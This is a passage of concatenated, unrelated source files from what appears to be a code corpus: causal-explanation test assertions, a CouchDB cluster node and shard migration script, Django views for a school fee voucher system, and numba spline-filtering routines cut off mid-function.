assert CausalFormula({L: False, MD: False}, Negation(event)).entailed_by(causal_setting)  # (Md, (1, 1)) |= [L ← 0; MD ← 0](FF = 0) example from Page 21 [Halpern, 2016]
# Epistemic states: each k_i is a set of contexts the agent considers possible.
u0 = {U_L: False, U_MD: False}
u1 = {U_L: True, U_MD: False}
u2 = {U_L: False, U_MD: True}
u3 = {U_L: True, U_MD: True}
k1 = EpistemicState(causal_network, [u0, u1, u2, u3], exogenous_domains, endogenous_domains)
k2 = EpistemicState(causal_network, [u0, u1, u2], exogenous_domains, endogenous_domains)
k3 = EpistemicState(causal_network, [u0, u1, u3], exogenous_domains, endogenous_domains)
k4 = EpistemicState(causal_network, [u1, u3], exogenous_domains, endogenous_domains)
epistemic_states = [k1, k2, k3, k4]
# Explanations of FF=1 are the same for all four epistemic states.
explanations = [{frozendict(explanation) for explanation in find_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_explanations = [
    [{FF: True}, {L: True}, {MD: True}],
    [{FF: True}, {L: True}, {MD: True}],
    [{FF: True}, {L: True}, {MD: True}],
    [{FF: True}, {L: True}, {MD: True}]
]
assert explanations == [{frozendict(expected_explanation) for expected_explanation in epistemic_state} for epistemic_state in expected_explanations]
# Trivial vs nontrivial split differs per epistemic state: once L=1 holds in
# every considered context (k3, k4), L=1 becomes a trivial explanation.
trivial_explanations = [{frozendict(trivial_explanation) for trivial_explanation in find_trivial_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_trivial_explanations = [
    [{FF: True}],
    [{FF: True}],
    [{FF: True}, {L: True}],
    [{FF: True}, {L: True}]
]
assert trivial_explanations == [{frozendict(expected_trivial_explanation) for expected_trivial_explanation in epistemic_state} for epistemic_state in expected_trivial_explanations]
nontrivial_explanations = [{frozendict(nontrivial_explanation) for nontrivial_explanation in find_nontrivial_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_nontrivial_explanations = [
    [{L: True}, {MD: True}],
    [{L: True}, {MD: True}],
    [{MD: True}],
    [{MD: True}]
]
assert nontrivial_explanations == [{frozendict(expected_nontrivial_explanation) for expected_nontrivial_explanation in epistemic_state} for epistemic_state in expected_nontrivial_explanations]
| 4,268 | 1,664 |
import getpass
import requests
import argparse
def main():
    """Migrate a CouchDB 2.x cluster's node membership and shard maps.

    For each old->new IP pair in node_map: delete the old node document from
    the _nodes DB, register the new node, rewrite every listed database's
    _dbs shard document to reference the new IPs, and finally re-create the
    system databases if they still reference a retired node.
    Requires admin credentials; talks to the node-local port 15986 and the
    clustered port 15984 on the control node.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('username')
    parser.add_argument('-p', '--password')
    args = parser.parse_args()
    if not args.password:
        # Prompt interactively so the password never appears in shell history.
        args.password = getpass.getpass("Password")
    auth = (args.username, args.password)
    control_node = '100.71.184.25'
    # old IP -> new IP; the empty key is a new node with no predecessor.
    node_map = {
        "10.247.164.74": '100.71.184.25',
        "10.247.164.76": "100.71.184.8",
        "10.247.164.75": "100.71.184.9",
        "10.247.164.83": "100.71.184.6",
        "": "100.71.184.17",
    }
    print('\nUPDATING MEMBERSHIP\n')
    # {{}} survives .format as a literal {} placeholder for the node name.
    node_url = 'http://{}:15986/_nodes/couchdb@{{}}'.format(control_node)
    for old_node, new_node in node_map.items():
        if old_node:
            res = requests.get(node_url.format(old_node), auth=auth)
            if res.status_code == 200:
                # Deleting a CouchDB doc requires its current revision.
                rev = res.json()['_rev']
                url = node_url.format(old_node)
                res = requests.delete('{}?rev={}'.format(url, rev), auth=auth)
                print('DELETE node {}'.format(old_node), res.status_code)
        # Register the new node unless it is already a member.
        res = requests.get(node_url.format(new_node), auth=auth)
        if res.status_code != 200:
            res = requests.put(node_url.format(new_node), data="{}", auth=auth)
            print('ADD node {}'.format(new_node), res.status_code)
    print('\nUPDATING DATABASE DOCS\n')
    dbs = [
        "commcarehq",
        "commcarehq__apps",
        "commcarehq__auditcare",
        "commcarehq__domains",
        "commcarehq__fixtures",
        "commcarehq__fluff-bihar",
        "commcarehq__m4change",
        "commcarehq__meta",
        "commcarehq__mvp-indicators",
        "commcarehq__receiverwrapper",
        "commcarehq__users",
    ]
    dbs_url = 'http://{}:15986/_dbs/{{}}'.format(control_node)
    for db in dbs:
        res = requests.get(dbs_url.format(db), auth=auth)
        db_doc = res.text
        new_db_doc = db_doc
        # Plain text substitution of old IPs for new ones in the shard doc.
        for old_node, new_node in node_map.items():
            if old_node:
                new_db_doc = new_db_doc.replace(old_node, new_node)
        # Only write back if something actually changed.
        if db_doc != new_db_doc:
            res = requests.put(dbs_url.format( db), data=new_db_doc, auth=auth)
            print('UPDATE DB {}'.format(db), res.status_code)
    print('\nRE-CREATING SYSTEM DATABASES\n')
    system_dbs = [
        "_global_changes",
        "_replicator",
        "_users"
    ]
    for db in system_dbs:
        res = requests.get('http://{}:15986/_dbs/{}'.format(control_node, db), auth=auth)
        # Re-create when missing, or when the shard map still names the
        # retired node 10.247.164.12.
        create = res.status_code == 404
        if res.status_code == 200:
            db_doc = res.json()
            create = 'couchdb@10.247.164.12' in db_doc['by_node']
            if create:
                rev = db_doc['_rev']
                res = requests.delete('http://{}:15986/_dbs/{}{}'.format(control_node, db, '?rev={}'.format(rev)), auth=auth)
                print('DELETE db {}'.format(db), res.status_code)
        if create:
            # PUT on the clustered port (15984) creates the DB with new shards.
            res = requests.put('http://{}:15984/{}'.format(control_node, db), data="{}", auth=auth)
            print("CREATE db {}".format(db), res.status_code)
# Run only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
| 3,152 | 1,204 |
from django.shortcuts import render, redirect
from student.models import Admission
from .forms import SearchChallan
from django.utils import timezone
from django.db.models import Q
from .models import Voucher
from payroll.models import Salary
from django import forms
from django.contrib import messages
from django.urls import reverse_lazy
from django import forms
from django.db.models import Sum, Count
from django.http import HttpResponse, JsonResponse
import datetime
import json
from academic.models import Section, Classes
from num2words import num2words
# Create your views here.
from django.contrib.auth.mixins import PermissionRequiredMixin
from home.decorators import allowed_users
from django.contrib.auth.decorators import login_required
from payroll.models import Teacher
from home.views import SchoolProfile
from django.contrib.auth.models import User
# Fee section
class FeeDefSerchForm(forms.Form):
    """Single-field search form (a date picker) used by the fee-defaulter views.

    NOTE(review): the 'seacher'/'Serch' spellings are kept because templates
    and views reference these names. Also note the 'value' attr is evaluated
    once at import time, so it is the server start date, not "today" — confirm
    whether this is intended.
    """
    seacher_date = forms.CharField(
        widget = forms.TextInput(
            attrs = {
                'class': 'date seacher_date',
                'value': timezone.now().strftime('%Y-%m-%d')
            }
        )
    )
class VoucherForm(forms.ModelForm):
    """ModelForm exposing every field of the Voucher model."""
    class Meta:
        model = Voucher
        fields = '__all__'
def convert_month(month_val):
    """Zero-pad a single-digit month value to two characters.

    A one-character value comes back as a padded string (e.g. 5 -> '05');
    anything already two characters or longer is returned unchanged, so an
    int input like 12 stays an int.
    """
    text = str(month_val)
    if len(text) < 2:
        return '0' + text
    return month_val
def generate_voucher_number(number):
    """Return the next voucher/challan number as a zero-padded string.

    Args:
        number: the current highest voucher id, as an int or numeric string.

    Returns:
        str: ``number + 1`` left-padded with zeros to 9 digits; values that
        already have 9+ digits are returned without extra padding.

    Raises:
        ValueError: if ``number`` is not convertible to int.
    """
    # str.zfill(9) reproduces the original 8-branch if/elif padding ladder
    # exactly: every branch padded the incremented value to 9 characters.
    return str(int(number) + 1).zfill(9)
@login_required
# @allowed_users('add_voucher')
def fee_main(request):
    """Fee dashboard: current month/year fee and salary totals plus a
    12-month paid/unpaid chart for the user's module holder."""
    month = timezone.now().strftime("%m")
    current_month = timezone.now().strftime("%Y-%m-%d")
    year = timezone.now().strftime("%Y")
    # Staff accounts act as their own module holder; teachers inherit theirs.
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    # GETTING MONTHLY FEE
    current_month_total_fee = Voucher.objects.filter(
        month=month,
        fee_month=current_month,
        year=year,
        module_holder=module_holder
    ).aggregate(current_month_total_fee=Sum('monthly_tution_fee_paid'))
    # GETTING YEALY FEE
    current_year_total_fee = Voucher.objects.filter(
        year=year,
        module_holder=module_holder
    ).aggregate(current_year_total_fee=Sum('monthly_tution_fee_paid'))
    # GETTING MONTHLY SALARY TOTAL
    current_month_total_salary = Salary.objects.filter(
        Q(Salary_date__startswith=timezone.now().strftime('%Y-%m'),
        module_holder=module_holder)
    ).aggregate(monthly_salary=Sum('salary'))
    # GETTING yearly SALARY TOTAL
    current_year_total_salary = Salary.objects.filter(
        Q(Salary_date__startswith=timezone.now().strftime('%Y'),
        module_holder=module_holder)
    ).aggregate(yearly_salary=Sum('salary'))
    print(current_month_total_salary,'====================================')
    # # GETTING UNPAID VOUCHER MONTHLY
    # current_unpaid_Vouchers_monthly = Voucher.objects.filter(
    #     month = month,
    #     year = year,
    #     monthly_tution_fee_paid=0,
    #     module_holder=module_holder
    # ).count()
    # # GETTING UNPAID VOUCHER YEARLY
    # current_unpaid_Vouchers_yearly = Voucher.objects.filter(
    #     year = year,
    #     monthly_tution_fee_paid=0,
    #     module_holder=module_holder
    # ).count()
    # Build one paid/unpaid data point per calendar month of the current year.
    # NOTE(review): this loop rebinds `month`, shadowing the current-month
    # string computed above — nothing below relies on the old value, but keep
    # that in mind when editing.
    data_chart= []
    for month in range(1, 13):
        paid = Voucher.objects.filter(module_holder=module_holder, year=year, month=convert_month(month), monthly_tution_fee_paid__gt=1).aggregate(paid = Sum('monthly_tution_fee_paid'))
        unpaid = Voucher.objects.filter(module_holder=module_holder, year=year, month=convert_month(month), monthly_tution_fee_paid__lt=1).aggregate(unpaid = Sum('monthly_tution_fee') )
        data_chart.append({
            'paid': paid,
            'unpaid': unpaid,
            'date': year+'-'+str(convert_month(month))+'-'+'01'
        })
    # Flatten the aggregate dicts, mapping missing months (None sums) to 0.
    final_chart=[]
    for data in data_chart:
        if data['paid']['paid'] is None:
            paid = 0
        else:
            paid = data['paid']['paid']
        if data['unpaid']['unpaid'] is None:
            unpaid = 0
        else:
            unpaid = data['unpaid']['unpaid']
        final_chart.append({
            'paid_amount': paid,
            'un_paid_amount': unpaid,
            'date': data['date'],
        })
    print(final_chart)
    ddddd = json.dumps(final_chart)
    # NOTE(review): 'current_month_total_fee' appears twice in this dict;
    # the second (identical) entry silently wins.
    context = {
        'data_chart': final_chart,
        'ddddd': ddddd,
        'current_year_total_salary':current_year_total_salary,
        'current_month_total_salary': current_month_total_salary,
        'current_month_total_fee': current_month_total_fee,
        'current_year_total_fee': current_year_total_fee,
        # 'current_unpaid_Vouchers_monthly': current_unpaid_Vouchers_monthly,
        # 'current_unpaid_Vouchers_yearly': current_unpaid_Vouchers_yearly,
        'current_month': timezone.now().strftime('%B, %Y'),
        'current_month_redirect': timezone.now().strftime('%Y-%m-%d'),
        'current_year': timezone.now().strftime('%Y'),
        'current_month_total_fee': current_month_total_fee
    }
    return render(request,'fee/main.html', context)
@login_required
@allowed_users('view_voucher')
def fee_received(request, date):
    """List paid vouchers for a month ('YYYY-MM-DD') or a whole year ('YYYY').

    The `date` URL argument doubles as the selector: anything longer than
    four characters is treated as a full fee-month date, otherwise as a year.
    """
    # Staff accounts act as their own module holder; teachers inherit theirs.
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        module_holder = Teacher.objects.get(user_ptr_id=request.user.id).module_holder
    lookup = {'module_holder': module_holder, 'monthly_tution_fee_paid__gt': 1}
    if len(date) > 4:
        # Full date: constrain month, exact fee_month and year.
        lookup['month'] = date.split('-')[1]
        lookup['fee_month'] = date
        lookup['year'] = date.split('-')[0]
    else:
        lookup['year'] = date
    searched_data_month = Voucher.objects.filter(**lookup)
    return render(request, 'fee/fee_received.html', {'searched_data_month': searched_data_month})
@login_required
# @allowed_users('view_voucher')
def GenerateChallan(request):
    """Generate (or refresh) monthly fee challans for a class/section.

    On a valid POST, for every admitted student in the selected class/section:
    update the existing Voucher's issue/due dates if one exists for the fee
    month, otherwise create a new Voucher — pro-rating the first month's fee
    by admission day. Collects the resulting vouchers for the template.
    """
    all_vouchers = []
    # Staff accounts act as their own module holder; teachers inherit theirs.
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    if request.method=='POST':
        search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
        if search_form.is_valid():
            class_id = request.POST.get('classes')
            section_id = request.POST.get('admission_section')
            # issue_date = request.POST.get('issue_date'),
            # due_date = request.POST.get('due_date'),
            # fee_month = request.POST.get('fee_month'),
            # NOTE(review): the trailing comma makes `year` a 1-tuple, which the
            # next line immediately unwraps.
            year = request.POST.get('fee_month').split('-')[0],
            year = year[0]
            all_std = Admission.objects.filter(module_holder=module_holder, admission_class=class_id, admission_section=section_id)
            # print('===================\n', request.POST)
            for data in all_std:
                # An existing voucher for this student + fee month?
                search_voucher_data = Voucher.objects.filter(
                    student_name=Admission.objects.get(pk=data.pk),
                    father_name=data.father_name,
                    month=request.POST.get('fee_month').split('-')[1],
                    year=year,
                    module_holder=module_holder
                )
                if search_voucher_data.exists():
                    # Refresh only the printable dates on existing vouchers.
                    search_voucher_data.update(issue_date=request.POST.get('issue_date'),due_date=request.POST.get('due_date'))
                    messages.success(request, 'Data has been updated & ready to print')
                else:
                    messages.success(request, 'Data has been Saved & ready to print')
                    # Next challan number is derived from the latest Voucher id.
                    if Voucher.objects.count()>0:
                        challan_number = Voucher.objects.values('id').latest('id')['id']
                    else:
                        challan_number ='0'
                    #COLCULATING FEE WITH ADMISSION DATE
                    monthly_tution_fee_divided_in_days = 0
                    admission_date = str(data.admission_date).split('-')
                    admission_year = int(admission_date[0])
                    admission_month = int(admission_date[1])
                    admission_day = int(admission_date[2])
                    challan_year = int(request.POST.get('fee_month').split('-')[0])
                    challan_month = int(request.POST.get('fee_month').split('-')[1])
                    # Pro-rate the admission month: charge only the days after
                    # admission, assuming a 30-day month.
                    if(admission_year==challan_year and admission_month==challan_month):
                        monthly_tut_fee = data.monthly_tution_fee
                        per_day_fee = monthly_tut_fee/30
                        days_of_fee = 30-admission_day
                        monthly_tution_fee_divided_in_days = per_day_fee*days_of_fee
                    else:
                        monthly_tution_fee_divided_in_days = data.monthly_tution_fee
                    # Never bill months before the student was admitted.
                    if(admission_year<=challan_year and admission_month<=challan_month):
                        save_voucher = Voucher(
                            reg_number= data.admission_registration,
                            student_name=Admission.objects.get(pk=data.pk),
                            father_name=data.father_name,
                            issue_date=request.POST.get('issue_date'),
                            due_date=request.POST.get('due_date'),
                            fee_month=request.POST.get('fee_month'),
                            month= request.POST.get('fee_month').split('-')[1] ,
                            year=year,
                            challan_number=generate_voucher_number(challan_number),
                            monthly_tution_fee= monthly_tution_fee_divided_in_days,
                            section=data.admission_section,
                            class_name= data.admission_class,
                            module_holder = module_holder
                        ).save()
                # Collect this student's voucher(s) for rendering.
                all_vouchers_single = Voucher.objects.filter(
                    student_name=Admission.objects.get(pk=data.pk),
                    father_name=data.father_name,
                    month=request.POST.get('fee_month').split('-')[1],
                    year=year,
                )
                all_vouchers.append({'voucher':all_vouchers_single})
    else:
        search_form = SearchChallan(module_holder ,initial={'year':timezone.now().strftime('%Y')})
    context = {
        'search_form': search_form,
        'all_student': all_vouchers,
        'current_month': timezone.now().strftime('%B, %Y'),
        'current_year': timezone.now().strftime('%Y')
    }
    return render(request, 'fee/generate_challan.html', context)
@login_required
# @allowed_users('view_voucher')
def generated_challan(request):
    """Render printable fee challans — a parent copy and a school copy each.

    Expects a POST produced by the GenerateChallan page: parallel lists
    ('reg_number', 'name_of_student', 'father_name', 'challan_number',
    'monthly_tution_fee', 'admission_section', 'admission_class') plus
    scalar 'issue_date'/'due_date'/'fee_month'/'year' fields; each entry of
    the 'pk' list is an index into those parallel lists.

    Returns:
        HttpResponse rendering 'fee/generated_challan.html'.
    """
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    murge_data = []
    if request.method=='POST':
        for datas in request.POST.getlist('pk'):
            # Each 'pk' value indexes the parallel POST lists.
            idx = int(datas)
            data = {
                'reg_number': request.POST.getlist('reg_number')[idx],
                'student_name': request.POST.getlist('name_of_student')[idx],
                'father_name': request.POST.getlist('father_name')[idx],
                'issue_date': request.POST.get('issue_date'),
                'due_date': request.POST.get('due_date'),
                'fee_month': request.POST.get('fee_month'),
                'year': request.POST.get('year'),
                'challan_number': request.POST.getlist('challan_number')[idx],
                'monthly_tution_fee': request.POST.getlist('monthly_tution_fee')[idx],
                'section': request.POST.getlist('admission_section')[idx],
                'class_name': request.POST.getlist('admission_class')[idx],
                # Spell the amount out in words for the printed challan.
                'monthly_tution_fee_in_word': num2words(request.POST.getlist('monthly_tution_fee')[idx])
            }
            # Two copies per challan. BUG FIX: the original selected the label
            # with `if ps is 0:` — an identity comparison against an int
            # literal (SyntaxWarning since Python 3.8, correct only thanks to
            # CPython small-int caching). Iterating the labels avoids it.
            for copy in ("Parent's Copy", "School Copy"):
                murge_data.append({
                    'copy': copy,
                    'data': data
                })
    user = User.objects.get(username=module_holder)
    school_profile = SchoolProfile.objects.filter(username=user.pk).first()
    context = {
        'school_profile': school_profile,
        'murge_data': murge_data,
        'current_month': timezone.now().strftime('%B, %Y'),
        'current_year': timezone.now().strftime('%Y')
    }
    return render(request, 'fee/generated_challan.html', context)
@login_required
@allowed_users('view_voucher')
def UnpaidChallan(request):
    """Show all vouchers for a class/section/month, flagging paid vs unpaid.

    Despite the name, the query is not restricted to unpaid vouchers: every
    matching voucher is listed and its 'status' carries the paid amount
    (0 when unpaid).
    """
    # Staff accounts act as their own module holder; teachers inherit theirs.
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    all_vouchers = []
    if request.method=='POST':
        search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
        if search_form.is_valid():
            # print(request.POST,'========form is valid')
            search_voucher_data = Voucher.objects.filter(
                class_name=Classes.objects.get(pk=request.POST.get('classes')),
                section = Section.objects.get(pk=request.POST.get('admission_section')),
                # issue_date = request.POST.get('issue_date'),
                # due_date = request.POST.get('due_date'),
                # fee_month = request.POST.get('fee_month'),
                month=request.POST.get('fee_month').split('-')[1],
                year=request.POST.get('year'),
                module_holder = module_holder
            )
            status = 0
            # Flatten each voucher into a plain dict for the template, with
            # 'status' holding the paid amount (0 = unpaid).
            for data in search_voucher_data:
                if data.monthly_tution_fee_paid>0:
                    status = data.monthly_tution_fee_paid
                else:
                    status = 0
                all_vouchers.append({
                    'pk':data.pk,
                    'challan_number':data.challan_number,
                    'reg_number':data.reg_number ,
                    'monthly_tution_fee':data.monthly_tution_fee ,
                    'status':status,
                    'student_name':data.student_name ,
                    'father_name':data.father_name,
                    'section':data.section ,
                    'class_name':data.class_name ,
                })
            if len(all_vouchers)>0:
                print("not empty")
            else:
                messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
    else:
        search_form = SearchChallan(module_holder, initial={'year':timezone.now().strftime('%Y')})
    context = {
        'search_form': search_form,
        'all_student': all_vouchers,
        'current_month': timezone.now().strftime('%B, %Y'),
        'current_year': timezone.now().strftime('%Y')
    }
    return render(request, 'fee/unpaid_challan.html', context)
@login_required
@allowed_users('view_voucher')
def payChallan(request):
    """Record fee payments for the selected vouchers, then re-list them.

    Each posted 'pk' entry is '<voucher_pk>-<list_index>'; the voucher's
    paid amount is set from the 'monthly_tution_fee' list at that index.
    Afterwards the same class/section/month query as UnpaidChallan is
    re-run so the page reflects the new paid statuses.
    """
    # Staff accounts act as their own module holder; teachers inherit theirs.
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    all_vouchers = []
    if request.method=='POST':
        search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
        if search_form.is_valid():
            # print(request.POST, 'this is valid=============')
            for pk_index in request.POST.getlist('pk'):
                # 'pk' values are '<voucher_pk>-<index into posted fee list>'.
                pk = pk_index.split('-')[0]
                index = pk_index.split('-')[1]
                get_voucher_data = Voucher.objects.filter(pk=pk).update(
                    monthly_tution_fee_paid=request.POST.getlist('monthly_tution_fee')[int(index)]
                )
            search_voucher_data = Voucher.objects.filter(
                class_name=request.POST.get('classes'),
                section =request.POST.get('admission_section'),
                # issue_date = request.POST.get('issue_date'),
                # due_date = request.POST.get('due_date'),
                month=request.POST.get('fee_month').split('-')[1],
                year=request.POST.get('year'),
                module_holder = module_holder
            )
            status = 0
            # Flatten each voucher for the template; 'status' is the paid amount.
            for data in search_voucher_data:
                if data.monthly_tution_fee_paid>0:
                    status = data.monthly_tution_fee_paid
                else:
                    status = 0
                all_vouchers.append({
                    'pk':data.pk,
                    'challan_number':data.challan_number,
                    'reg_number':data.reg_number ,
                    'monthly_tution_fee':data.monthly_tution_fee ,
                    'status':status,
                    'student_name':data.student_name ,
                    'father_name':data.father_name,
                    'section':data.section ,
                    'class_name':data.class_name
                })
            if len(all_vouchers)>0:
                print("not empty")
            else:
                messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate Challan ")
    else:
        search_form = SearchChallan(module_holder, initial={'year':timezone.now().strftime('%Y')})
    context = {
        'search_form': search_form,
        'all_student': all_vouchers,
        'now': timezone.now().strftime('%m/%d/%Y')
    }
    return render(request, 'fee/unpaid_challan.html', context)
@login_required
@allowed_users('view_voucher')
def fee_defaulter(request):
    """List vouchers with no recorded payment (fee defaulters).

    GET shows defaulters for the current month; POST searches a chosen
    month and applies any submitted payments before re-listing.
    """
    # Staff accounts act under their own username; teachers inherit the
    # module holder recorded on their Teacher profile.
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    all_vouchers = []
    date = timezone.now().strftime('%Y-%m-%d')
    if request.method=='GET':
        # Unpaid (< 1) vouchers for the current month/year.
        search_voucher_data = Voucher.objects.filter(
            Q(monthly_tution_fee_paid__lt=1,
            month=date.split('-')[1],
            year=date.split('-')[0],
            module_holder = module_holder)
        )
    if request.method=='POST':
        Feedefserchform = FeeDefSerchForm(request.POST)
        # 'seacher_date' arrives as 'YYYY-MM...'; split gives year and month.
        search_voucher_data = Voucher.objects.filter(
            Q(monthly_tution_fee_paid__lt=1,
            month=request.POST.get('seacher_date').split('-')[1],
            year=request.POST.get('seacher_date').split('-')[0],
            module_holder = module_holder)
        )
        if search_voucher_data:
            print(search_voucher_data, 'this is valid=============')
            # Apply submitted payment amounts positionally, pk-by-pk.
            index = 0
            for pk_id in request.POST.getlist('pk'):
                get_voucher_data = Voucher.objects.filter(pk=pk_id).update(
                    monthly_tution_fee_paid=request.POST.getlist('monthly_tution_fee')[index]
                )
                index = index+1
            # NOTE(review): this warning fires even after successful updates --
            # looks like a copy-paste mistake; confirm whether a success
            # message was intended here.
            messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
        else:
            messages.warning(request," There is no fee defaulter in this month ")
    else:
        Feedefserchform = FeeDefSerchForm()
    # 'status' carries the amount already paid (0 means still unpaid).
    status = 0
    for data in search_voucher_data:
        if data.monthly_tution_fee_paid>0:
            status = data.monthly_tution_fee_paid
        else:
            status = 0
        all_vouchers.append({
            'pk':data.pk,
            'challan_number':data.challan_number,
            'reg_number':data.reg_number ,
            'monthly_tution_fee':data.monthly_tution_fee ,
            'status':status,
            'student_name':data.student_name ,
            'father_name':data.father_name,
            'section':data.section ,
            'class_name':data.class_name ,
        })
    if len(search_voucher_data)>0:
        print("not empty")
    else:
        messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
    context = {
        'all_student': all_vouchers,
        'Feedefserchform': Feedefserchform,
        'current_month': timezone.now().strftime('%B, %Y'),
        'current_year': timezone.now().strftime('%Y')
    }
    return render(request,'fee/fee_defaulter.html', context)
from __future__ import division
import numpy as np
import time
from numba import jit, njit
# used by njitted routines (frozen)
# Row stencil written into the interior rows of the interpolation system
# by find_coefs_1d (three band entries plus an unused fourth slot).
basis = np.array([1.0 / 6.0, 2.0 / 3.0, 1.0 / 6.0, 0.0])
@njit(cache=True)
def solve_deriv_interp_1d(bands, coefs):
    """Solve the banded spline interpolation system in place.

    ``bands`` has shape (M+2, 4): columns 0..2 hold the band entries of a
    row and column 3 holds its right-hand side.  ``coefs`` (length M+2)
    receives the solution.  Both arrays are mutated.  The first and last
    rows come from boundary conditions and are eliminated separately
    from the interior rows.
    """
    M = coefs.shape[0] - 2
    # Solve interpolating equations
    # First and last rows are different
    # Normalise row 0 by its pivot, then eliminate it from row 1.
    bands[0, 1] /= bands[0, 0]
    bands[0, 2] /= bands[0, 0]
    bands[0, 3] /= bands[0, 0]
    bands[0, 0] = 1.0
    bands[1, 1] -= bands[1, 0] * bands[0, 1]
    bands[1, 2] -= bands[1, 0] * bands[0, 2]
    bands[1, 3] -= bands[1, 0] * bands[0, 3]
    bands[0, 0] = 0.0
    bands[1, 2] /= bands[1, 1]
    bands[1, 3] /= bands[1, 1]
    bands[1, 1] = 1.0
    # Now do rows 2 through M+1
    # Forward elimination: each row uses the already-reduced row above it.
    for row in range(2, M + 1):
        bands[row, 1] -= bands[row, 0] * bands[row - 1, 2]
        bands[row, 3] -= bands[row, 0] * bands[row - 1, 3]
        bands[row, 2] /= bands[row, 1]
        bands[row, 3] /= bands[row, 1]
        bands[row, 0] = 0.0
        bands[row, 1] = 1.0
    # Do last row
    # The boundary row couples to rows M-1 and M, hence the two-step
    # elimination before normalising on column 2.
    bands[M + 1, 1] -= bands[M + 1, 0] * bands[M - 1, 2]
    bands[M + 1, 3] -= bands[M + 1, 0] * bands[M - 1, 3]
    bands[M + 1, 2] -= bands[M + 1, 1] * bands[M, 2]
    bands[M + 1, 3] -= bands[M + 1, 1] * bands[M, 3]
    bands[M + 1, 3] /= bands[M + 1, 2]
    bands[M + 1, 2] = 1.0
    coefs[M + 1] = bands[(M + 1), 3]
    # Now back substitute up
    for row in range(M, 0, -1):
        coefs[row] = bands[row, 3] - bands[row, 2] * coefs[row + 1]
    # Finish with first row
    coefs[0] = bands[0, 3] - bands[0, 1] * coefs[1] - bands[0, 2] * coefs[2]
@njit(cache=True)
def find_coefs_1d(delta_inv, M, data, coefs):
    """Build and solve the 1-D spline system for one line of data.

    Fills an (M+2, 4) band matrix -- boundary rows plus one interior row
    per data point using the module-level ``basis`` stencil -- and writes
    the resulting M+2 coefficients into ``coefs`` (mutated in place).
    """
    bands = np.zeros((M + 2, 4))
    # Setup boundary conditions
    abcd_left = np.zeros(4)
    abcd_right = np.zeros(4)
    # Left boundary
    # (1, -2, 1) second-difference stencil scaled by delta_inv^2 with a
    # zero RHS, i.e. the second derivative is forced to zero at the end.
    abcd_left[0] = 1.0 * delta_inv * delta_inv
    abcd_left[1] = -2.0 * delta_inv * delta_inv
    abcd_left[2] = 1.0 * delta_inv * delta_inv
    abcd_left[3] = 0
    # Right boundary
    # Identical stencil on the right end.
    abcd_right[0] = 1.0 * delta_inv * delta_inv
    abcd_right[1] = -2.0 * delta_inv * delta_inv
    abcd_right[2] = 1.0 * delta_inv * delta_inv
    abcd_right[3] = 0
    for i in range(4):
        bands[0, i] = abcd_left[i]
        bands[M + 1, i] = abcd_right[i]
    # Interior rows: fixed basis stencil, data value as RHS.
    for i in range(M):
        for j in range(3):
            bands[i + 1, j] = basis[j]
        bands[i + 1, 3] = data[i]
    solve_deriv_interp_1d(bands, coefs)
@njit(cache=True)
def filter_coeffs_1d(dinv, data):
    """Return spline coefficients (length n+2) for a 1-D data line."""
    n_points = data.shape[0]
    coefs = np.zeros(n_points + 2)
    find_coefs_1d(dinv[0], n_points, data, coefs)
    return coefs
@njit(cache=True)
def filter_coeffs_2d(dinv, data):
    """Tensor-product 2-D spline fit: solve along X, then along Y."""
    mx = data.shape[0]
    my = data.shape[1]
    nx = mx + 2
    ny = my + 2
    coefs = np.zeros((nx, ny))
    # X pass: one banded solve per data column.
    for col in range(my):
        find_coefs_1d(dinv[0], mx, data[:, col], coefs[:, col])
    # Y pass: sweep every row of the padded coefficient array.
    for row in range(nx):
        find_coefs_1d(dinv[1], my, coefs[row, :], coefs[row, :])
    return coefs
@njit(cache=True)
def filter_coeffs_3d(dinv, data):
    """Tensor-product 3-D spline fit: successive 1-D solves along X, Y, Z."""
    mx = data.shape[0]
    my = data.shape[1]
    mz = data.shape[2]
    nx = mx + 2
    ny = my + 2
    nz = mz + 2
    coefs = np.zeros((nx, ny, nz))
    # X pass over the raw data.
    for j in range(my):
        for k in range(mz):
            find_coefs_1d(dinv[0], mx, data[:, j, k], coefs[:, j, k])
    # Y pass over the padded X extent.
    for i in range(nx):
        for k in range(mz):
            find_coefs_1d(dinv[1], my, coefs[i, :, k], coefs[i, :, k])
    # Z pass over the padded X and Y extents.
    for i in range(nx):
        for j in range(ny):
            find_coefs_1d(dinv[2], mz, coefs[i, j, :], coefs[i, j, :])
    return coefs
@njit(cache=True)
def filter_coeffs_4d(dinv, data):
    """Tensor-product 4-D spline fit: successive 1-D solves along each axis."""
    m0 = data.shape[0]
    m1 = data.shape[1]
    m2 = data.shape[2]
    m3 = data.shape[3]
    n0 = m0 + 2
    n1 = m1 + 2
    n2 = m2 + 2
    n3 = m3 + 2
    coefs = np.zeros((n0, n1, n2, n3))
    # Axis-0 pass over the raw data.
    for j in range(m1):
        for k in range(m2):
            for l in range(m3):
                find_coefs_1d(dinv[0], m0, data[:, j, k, l], coefs[:, j, k, l])
